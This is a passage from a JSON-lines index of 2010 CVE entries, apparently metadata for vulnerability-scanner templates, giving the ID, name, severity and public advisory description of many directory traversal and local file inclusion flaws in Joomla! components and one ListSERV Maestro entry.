Traversal","Severity":"high","Description":"A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0943.yaml"} +{"ID":"CVE-2010-0944","Info":{"Name":"Joomla! Component com_jcollection - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0944.yaml"} +{"ID":"CVE-2010-0972","Info":{"Name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0972.yaml"} +{"ID":"CVE-2010-0982","Info":{"Name":"Joomla! Component com_cartweberp - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0982.yaml"} +{"ID":"CVE-2010-0985","Info":{"Name":"Joomla! Component com_abbrev - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0985.yaml"} +{"ID":"CVE-2010-1056","Info":{"Name":"Joomla! Component com_rokdownloads - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1056.yaml"} +{"ID":"CVE-2010-1081","Info":{"Name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1081.yaml"} +{"ID":"CVE-2010-1217","Info":{"Name":"Joomla! Component \u0026 Plugin JE Tooltip 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1217.yaml"} +{"ID":"CVE-2010-1219","Info":{"Name":"Joomla! Component com_janews - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1219.yaml"} +{"ID":"CVE-2010-1302","Info":{"Name":"Joomla! Component DW Graph - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1302.yaml"} +{"ID":"CVE-2010-1304","Info":{"Name":"Joomla! Component User Status - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1304.yaml"} +{"ID":"CVE-2010-1305","Info":{"Name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1305.yaml"} +{"ID":"CVE-2010-1306","Info":{"Name":"Joomla! Component Picasa 2.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1306.yaml"} +{"ID":"CVE-2010-1307","Info":{"Name":"Joomla! Component Magic Updater - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1307.yaml"} +{"ID":"CVE-2010-1308","Info":{"Name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1308.yaml"} +{"ID":"CVE-2010-1312","Info":{"Name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1312.yaml"} +{"ID":"CVE-2010-1313","Info":{"Name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1313.yaml"} +{"ID":"CVE-2010-1314","Info":{"Name":"Joomla! Component Highslide 1.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1314.yaml"} +{"ID":"CVE-2010-1315","Info":{"Name":"Joomla! Component webERPcustomer - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1315.yaml"} +{"ID":"CVE-2010-1340","Info":{"Name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1340.yaml"} +{"ID":"CVE-2010-1345","Info":{"Name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1345.yaml"} +{"ID":"CVE-2010-1352","Info":{"Name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1352.yaml"} +{"ID":"CVE-2010-1353","Info":{"Name":"Joomla! Component LoginBox - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1353.yaml"} +{"ID":"CVE-2010-1354","Info":{"Name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1354.yaml"} +{"ID":"CVE-2010-1461","Info":{"Name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1461.yaml"} +{"ID":"CVE-2010-1469","Info":{"Name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1469.yaml"} +{"ID":"CVE-2010-1470","Info":{"Name":"Joomla! Component Web TV 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1470.yaml"} +{"ID":"CVE-2010-1471","Info":{"Name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1471.yaml"} +{"ID":"CVE-2010-1472","Info":{"Name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1472.yaml"} +{"ID":"CVE-2010-1473","Info":{"Name":"Joomla! Component Advertising 0.25 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1473.yaml"} +{"ID":"CVE-2010-1474","Info":{"Name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1474.yaml"} +{"ID":"CVE-2010-1475","Info":{"Name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Preventive \u0026 Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1475.yaml"} +{"ID":"CVE-2010-1476","Info":{"Name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1476.yaml"} +{"ID":"CVE-2010-1478","Info":{"Name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1478.yaml"} +{"ID":"CVE-2010-1491","Info":{"Name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1491.yaml"} +{"ID":"CVE-2010-1494","Info":{"Name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1494.yaml"} +{"ID":"CVE-2010-1495","Info":{"Name":"Joomla! Component Matamko 1.01 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1495.yaml"} +{"ID":"CVE-2010-1531","Info":{"Name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1531.yaml"} +{"ID":"CVE-2010-1532","Info":{"Name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1532.yaml"} +{"ID":"CVE-2010-1533","Info":{"Name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1533.yaml"} +{"ID":"CVE-2010-1534","Info":{"Name":"Joomla! Component Shoutbox Pro - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1534.yaml"} +{"ID":"CVE-2010-1535","Info":{"Name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1535.yaml"} +{"ID":"CVE-2010-1540","Info":{"Name":"Joomla! Component com_blog - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1540.yaml"} +{"ID":"CVE-2010-1601","Info":{"Name":"Joomla! Component JA Comment - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1601.yaml"} +{"ID":"CVE-2010-1602","Info":{"Name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1602.yaml"} +{"ID":"CVE-2010-1603","Info":{"Name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1603.yaml"} +{"ID":"CVE-2010-1607","Info":{"Name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1607.yaml"} +{"ID":"CVE-2010-1653","Info":{"Name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1653.yaml"} +{"ID":"CVE-2010-1657","Info":{"Name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1657.yaml"} +{"ID":"CVE-2010-1658","Info":{"Name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1658.yaml"} +{"ID":"CVE-2010-1659","Info":{"Name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1659.yaml"} +{"ID":"CVE-2010-1714","Info":{"Name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1714.yaml"} +{"ID":"CVE-2010-1715","Info":{"Name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1715.yaml"} +{"ID":"CVE-2010-1717","Info":{"Name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1717.yaml"} +{"ID":"CVE-2010-1718","Info":{"Name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1718.yaml"} +{"ID":"CVE-2010-1719","Info":{"Name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1719.yaml"} +{"ID":"CVE-2010-1722","Info":{"Name":"Joomla! Component Online Market 2.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1722.yaml"} +{"ID":"CVE-2010-1723","Info":{"Name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1723.yaml"} +{"ID":"CVE-2010-1858","Info":{"Name":"Joomla! Component SMEStorage - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1858.yaml"} +{"ID":"CVE-2010-1870","Info":{"Name":"ListSERV Maestro \u003c= 9.0-8 RCE","Severity":"info","Description":"A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8.","Classification":{"CVSSScore":"5"}},"file_path":"cves/2010/CVE-2010-1870.yaml"} +{"ID":"CVE-2010-1875","Info":{"Name":"Joomla! Component Property - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1875.yaml"} +{"ID":"CVE-2010-1878","Info":{"Name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1878.yaml"} +{"ID":"CVE-2010-1952","Info":{"Name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1952.yaml"} +{"ID":"CVE-2010-1953","Info":{"Name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1953.yaml"} +{"ID":"CVE-2010-1954","Info":{"Name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1954.yaml"} +{"ID":"CVE-2010-1955","Info":{"Name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1955.yaml"} +{"ID":"CVE-2010-1956","Info":{"Name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1956.yaml"} +{"ID":"CVE-2010-1957","Info":{"Name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1957.yaml"} +{"ID":"CVE-2010-1977","Info":{"Name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1977.yaml"} +{"ID":"CVE-2010-1979","Info":{"Name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1979.yaml"} +{"ID":"CVE-2010-1980","Info":{"Name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1980.yaml"} +{"ID":"CVE-2010-1981","Info":{"Name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1981.yaml"} +{"ID":"CVE-2010-1982","Info":{"Name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1982.yaml"} +{"ID":"CVE-2010-1983","Info":{"Name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","Severity":"high","Description":"A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1983.yaml"} +{"ID":"CVE-2010-2033","Info":{"Name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2033.yaml"} +{"ID":"CVE-2010-2034","Info":{"Name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly 